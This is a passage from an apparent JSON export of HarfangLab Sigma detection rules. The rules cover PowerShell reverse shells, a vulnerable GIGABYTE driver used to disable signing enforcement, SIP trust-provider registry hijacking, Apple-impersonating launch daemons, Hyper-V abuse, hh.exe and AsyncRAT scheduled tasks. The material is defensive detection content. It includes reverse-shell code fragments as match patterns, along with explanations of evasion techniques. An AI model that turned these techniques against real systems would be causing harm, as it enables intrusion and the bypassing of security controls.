'?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_{????????-????-????-????-????????????}.ps1'\n PowershellCommand|contains:\n - '[void]$socket.ConnectAsync($RemoteIP, $RemotePort).Wait(200)'\n - '$TcpSocket = New-Object Net.Sockets.TcpClient -ErrorAction SilentlyContinue'\n - '$SslStream = New-Object Net.Security.SslStream $TcpClient.GetStream()'\n - '$ProtocolNames= @(\"ssl2\",\"ssl3\",\"tls\",\"tls11\",\"tls12\")'\n\n exclusion_icinga:\n - PowershellScriptPath: '?:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\cache\\framework_cache.psm1'\n - ProcessParentImage: '?:\\Program Files\\ICINGA2\\sbin\\icinga2.exe'\n - PowershellCommand|contains|all:\n - 'https://github.com/Icinga/icinga-powershell-framework'\n - 'function Get-IcingaDirectorSelfServiceConfig()'\n\n exclusion_opsramp:\n PowershellScriptPath|startswith: '?:\\Program Files (x86)\\OpsRamp\\Agent\\'\n\n exclusion_lpar2rrd:\n PowershellCommand|contains|all:\n - '## lpar2rrd-agent.ps1'\n - '# implementation notes for daemon on lpar2rrd server side'\n\n exclusion_synology_backup:\n # $b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"\n # Command sent to the backup server to test the connection.\n - PowershellCommand|contains: '$b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"'\n - ProcessCommandLine|contains:\n - 'JABiADYANAAgAD0AIAAiAFEAaABBAEEAQgBtAEYAagBkAEcAbAB2AGIAaABBAEEARAAzAFIAbABjADMAUgBmAFkAMgA5AHUAYgBtAFYAagBkAEcAbAB2AGIAawBBAD0A'\n - 'QAYgA2ADQAIAA9ACAAIgBRAGgAQQBBAEIAbQBGAGoAZABHAGwAdgBiAGgAQQBBAEQAMwBSAGwAYwAzAFIAZgBZADIAOQB1AGIAbQBWAGoAZABHAGwAdgBiAGsAQQA9A'\n - 'kAGIANgA0ACAAPQAgACIAUQBoAEEAQQBCAG0ARgBqAGQARwBsAHYAYgBoAEEAQQBEADMAUgBsAGMAMwBSAGYAWQAyADkAdQBiAG0AVgBqAGQARwBsAHYAYgBrAEEAPQ'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a",
"rule_name": "PowerShell Reverse Shell Executed",
"rule_description": "Detects suspicious reverse shell execution via PowerShell.\nA reverse shell is a shell session whose network connection is initiated by the target host outward to a remote machine, rather than inbound by the remote machine.\nAttackers often use reverse shells to bypass firewall restrictions on inbound connections.\nIt is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2026-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071468Z",
"creation_date": "2026-03-23T11:45:34.071470Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071474Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mallo-m",
"https://github.com/ASkyeye/CVE-2018-19320"
],
"name": "t1562_001_axiomdriver_created.yml",
"content": "title: AxiomDriver Created\nid: 2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb\ndescription: |\n Detects the creation of the Axiom driver.\n Axiom is a set of tools used for malicious activities such as dumping the LSASS process memory or loading shellcode using different techniques to avoid being detected by security tools such as EDRs.\n Axiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\n It is recommended to investigate the execution context and the drivers loaded before this one, to determine whether a vulnerable driver was already loaded beforehand to disable DSE.\nreferences:\n - https://github.com/mallo-m\n - https://github.com/ASkyeye/CVE-2018-19320\ndate: 2025/03/26\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\Drivers\\AxiomDriver.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb",
"rule_name": "AxiomDriver Created",
"rule_description": "Detects the creation of the Axiom driver.\nAxiom is a set of tools used for malicious activities such as dumping the LSASS process memory or loading shellcode using different techniques to avoid being detected by security tools such as EDRs.\nAxiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\nIt is recommended to investigate the execution context and the drivers loaded before this one, to determine whether a vulnerable driver was already loaded beforehand to disable DSE.\n",
"rule_creation_date": "2025-03-26",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a653231-c597-40e1-b664-2415c9a4a2e4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296105Z",
"creation_date": "2026-03-23T11:45:35.296108Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296115Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
"https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode",
"https://attack.mitre.org/techniques/T1553/003/"
],
"name": "t1553_003_sip_trust_provider_hijacking.yml",
"content": "title: SIP or Trust Provider Hijacked via Registry Modification\nid: 2a653231-c597-40e1-b664-2415c9a4a2e4\ndescription: |\n Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\n SIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\n Investigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\nreferences:\n - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\n - https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode\n - https://attack.mitre.org/techniques/T1553/003/\ndate: 2026/01/29\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.003\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_dll:\n EventType: SetValue\n TargetObject:\n # SIP 
Signature retrieval DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n # Hash validation DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n\n selection_funcname:\n EventType: SetValue\n TargetObject:\n # SIP signature retrieval function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n # Hash validation function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n\n selection_filetype:\n TargetObject|contains:\n - '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}' # PEs\n - '{603BCC1F-4B59-4E08-B724-D2C6297EF351}' # PowerShell\n - '{DE351A43-8E59-11D0-8C47-00C04FC295EE}' # Catalog\n - '{000C10F1-0000-0000-C000-000000000046}' # MSI\n - '{C689AABA-8E78-11D0-8C47-00C04FC295EE}' # Cabinet\n\n filter_legitimate_dll:\n Details:\n - 'mso.dll'\n - 'WINTRUST.DLL'\n - 'MSISIP.DLL'\n - '?:\\Program Files\\ReasonLabs\\EPP\\x64\\rsSIPProvider.dll'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - 
'?:\\Windows\\SysWOW64\\AppxSip.dll'\n - '?:\\Windows\\System32\\AppxSip.dll'\n - '?:\\Windows\\SysWOW64\\wshext.dll'\n - '?:\\Windows\\System32\\wshext.dll'\n - '?:\\Windows\\SysWOW64\\MSISIP.DLL'\n - '?:\\Windows\\System32\\MSISIP.DLL'\n - '?:\\Windows\\SysWOW64\\pwrshsip.dll'\n - '?:\\Windows\\System32\\pwrshsip.dll'\n\n filter_legitimate_funcname:\n Details:\n # Verify Indirect Data\n - 'MsoVBADigSigVerifyIndirectData'\n - 'CryptSIPVerifyIndirectData'\n - 'SIPVerifyIndirectData'\n - 'PsVerifyHash'\n - 'MsiSIPVerifyIndirectData'\n\n # Get Signed Data\n - 'MsoVBADigSigGetSignedDataMsg'\n - 'CryptSIPGetSignedDataMsg'\n - 'SIPGetSignedDataMsg'\n - 'PsGetSignature'\n - 'MsiSIPGetSignedDataMsg'\n\n condition: (\n (selection_dll and not filter_legitimate_dll) or\n (selection_funcname and not filter_legitimate_funcname)\n )\n and selection_filetype # and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a653231-c597-40e1-b664-2415c9a4a2e4",
"rule_name": "SIP or Trust Provider Hijacked via Registry Modification",
"rule_description": "Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\nSIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\nInvestigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\n",
"rule_creation_date": "2026-01-29",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1553.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616863Z",
"creation_date": "2026-03-23T11:45:34.616866Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616891Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/",
"https://attack.mitre.org/techniques/T1036/004/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1030_004_susp_plist_masquerading_apple.yml",
"content": "title: Suspicious Plist Masquerading Apple Name\nid: 2a93d0e0-f93d-4c54-a111-ce4c67fdc506\ndescription: |\n Detects the creation of a launch daemon or agent impersonating Apple.\n Adversaries may install persistence impersonating Apple in order to bypass simple security controls.\n It is recommended to check the content of the newly created persistence.\nreferences:\n - https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|contains: # create\n - '/Library/LaunchDaemons/'\n - '/Library/LaunchAgents/'\n - TargetPath|contains: # rename\n - '/Library/LaunchAgents/'\n - '/Library/LaunchDaemons/'\n selection_kind:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_name:\n - Path|endswith: 'com.apple.*'\n - TargetPath|endswith: 'com.apple.*'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506",
"rule_name": "Suspicious Plist Masquerading Apple Name",
"rule_description": "Detects the creation of a launch daemon or agent impersonating Apple.\nAdversaries may install persistence impersonating Apple in order to bypass simple security controls.\nIt is recommended to check the content of the newly created launch daemon or agent.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2aa99981-34d6-4623-8d69-576d9828ba9c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626100Z",
"creation_date": "2026-03-23T11:45:34.626102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_enable_hyperv.yml",
"content": "title: Windows Hyper-V Enabled\nid: 2aa99981-34d6-4623-8d69-576d9828ba9c\ndescription: |\n Detects the activation of the Windows Hyper-V virtualization feature.\n This command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\n Attackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistence.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2025/11/12\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Dism.exe'\n - OriginalFileName: 'DISM.EXE'\n\n selection_command:\n CommandLine|contains|all:\n - ' ?online'\n - ' ?enable-feature'\n - ' ?all'\n - ' ?featurename:microsoft-hyper-v'\n - ' ?norestart'\n\n exclusion_docker:\n ParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\chocolatey\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2aa99981-34d6-4623-8d69-576d9828ba9c",
"rule_name": "Windows Hyper-V Enabled",
"rule_description": "Detects the activation of the Windows Hyper-V virtualization feature.\nThis command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\nAttackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistence.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n",
"rule_creation_date": "2025-11-12",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2aaef300-223b-4962-a97a-3b22e67f8221",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085739Z",
"creation_date": "2026-03-23T11:45:34.085741Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085746Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Hh/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1218_hh.yml",
"content": "title: Hh.exe Execution\nid: 2aaef300-223b-4962-a97a-3b22e67f8221\ndescription: |\n Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\n This binary can be abused by attackers to download remote files or execute binaries.\n It is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Hh/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/07/12\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\hh.exe'\n - OriginalFileName: 'HH.exe'\n filter_chm:\n CommandLine|endswith:\n - '.chm'\n - '.chm\"'\n\n exclusion_ibm:\n ParentImage:\n - '?:\\Program Files (x86)\\IBM\\Personal Communications\\pcsws.exe'\n - '?:\\Program Files\\Personal Communications\\pcsws.exe'\n\n exclusion_autohotkey:\n ParentImage|endswith: '\\AutoHotkey.exe'\n # C:\\Windows\\hh.exe ms-its:C:\\Program Files\\AutoHotkey\\AutoHotkey.chm::/docs/Welcome.htm\n CommandLine|contains: 'ms-its:*AutoHotkey.chm::/docs/'\n\n exclusion_lenovo:\n CommandLine|contains: '?:\\Program Files (x86)\\Lenovo\\Update Retriever\\'\n\n exclusion_fiduexpert:\n Image|endswith: '\\RF Logiciels\\Fidu-Expert*\\hh.exe'\n ParentImage|endswith: '\\RF Logiciels\\Fidu-Expert*\\FiduExpert.exe'\n\n exclusion_eic:\n # https://www.eic.fr/\n Image: '?:\\EIC\\DR\\Application *\\hh.exe'\n ParentImage: '?:\\EIC\\DR\\Application *\\dr.exe'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - 
'?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2aaef300-223b-4962-a97a-3b22e67f8221",
"rule_name": "Hh.exe Execution",
"rule_description": "Detects the execution of the hh.exe Windows binary, which is used to process chm files on Windows.\nThis binary can be abused by attackers to download remote files or execute binaries.\nIt is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\n",
"rule_creation_date": "2021-07-12",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622939Z",
"creation_date": "2026-03-23T11:45:34.622941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622945Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html",
"https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/",
"https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
"https://attack.mitre.org/techniques/T1053/005/",
"https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"
],
"name": "t1053_005_asyncrat_scheduled_task.yml",
"content": "title: AsyncRAT Scheduled Task Created\nid: 2acfef72-9bfe-4583-9f0a-0fdbec088a28\ndescription: |\n Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\n Attackers often use scheduled tasks to persistently execute malicious code.\n It is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\nreferences:\n - https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/\n - https://attack.mitre.org/techniques/T1053/005/\n - https://lolbas-project.github.io/lolbas/Binaries/Schtasks/\ndate: 2022/08/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Schtasks\n - classification.Windows.HackTool.AsyncRAT\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_cmd1:\n CommandLine|contains:\n - '/create '\n - '-create '\n - ' create '\n selection_cmd2:\n CommandLine|contains:\n - '/tn '\n - '-tn '\n\n selection_specific_asyncrat_1:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Roaming\\'\n\n selection_specific_asyncrat_2:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Local\\Temp\\'\n\n selection_specific_public_directory_1:\n CommandLine|contains|all:\n - '/sc minute /mo'\n - '\\Users\\Public\\'\n\n selection_specific_public_directory_2:\n CommandLine|contains|all:\n - '/Create /XML'\n - '\\Users\\Public\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: 
'?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_psappdeploytoolkit:\n # C:\\WINDOWS\\System32\\schtasks.exe /create /f /tn DeltaManager_2.0.0.2_1.0_2.0.0.2_FR_BlockedApps /xml C:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml\n CommandLine:\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\PSAppDeployToolkit-ExecuteAsUser.xml*'\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml*'\n\n exclusion_wapt:\n ParentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n condition: selection_bin and all of selection_cmd* and 1 of selection_specific_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28",
"rule_name": "AsyncRAT Scheduled Task Created",
"rule_description": "Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\nAttackers often use scheduled tasks to persistently execute malicious code.\nIt is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\n",
"rule_creation_date": "2022-08-22",
